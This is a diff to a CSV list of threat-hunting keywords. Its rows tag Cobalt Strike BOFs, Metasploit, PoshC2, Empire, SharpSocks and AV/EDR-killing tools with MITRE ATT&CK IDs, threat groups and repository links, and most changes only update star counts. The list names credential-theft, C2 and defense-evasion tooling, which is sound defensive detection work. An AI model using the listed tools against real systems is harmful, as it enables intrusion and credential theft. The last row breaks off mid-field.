TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_killer.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*process_memdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*process_mimikatz*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*process_inject_transform_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_killer.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*process_memdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*process_mimikatz*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*process_protection_enum *","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_protection_enum*.dmp*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","","N/A","","","" "*process_protection_enum.*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" @@ -15182,52 +15350,52 @@ "*Process_Protection_Level_BOF/*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_snapshot.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ProcessCommandChannelImplantMessage*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" -"*ProcessDestroy.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ProcessDestroy.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ProcessDestroy.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ProcessDestroy.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*ProcessEncryptedC2Request*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" -"*ProcessFileZillaFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessHerpaderping_x64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ProcessHerpaderping_x86*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ProcessHerpaderpingTemplate*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ProcessFileZillaFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - 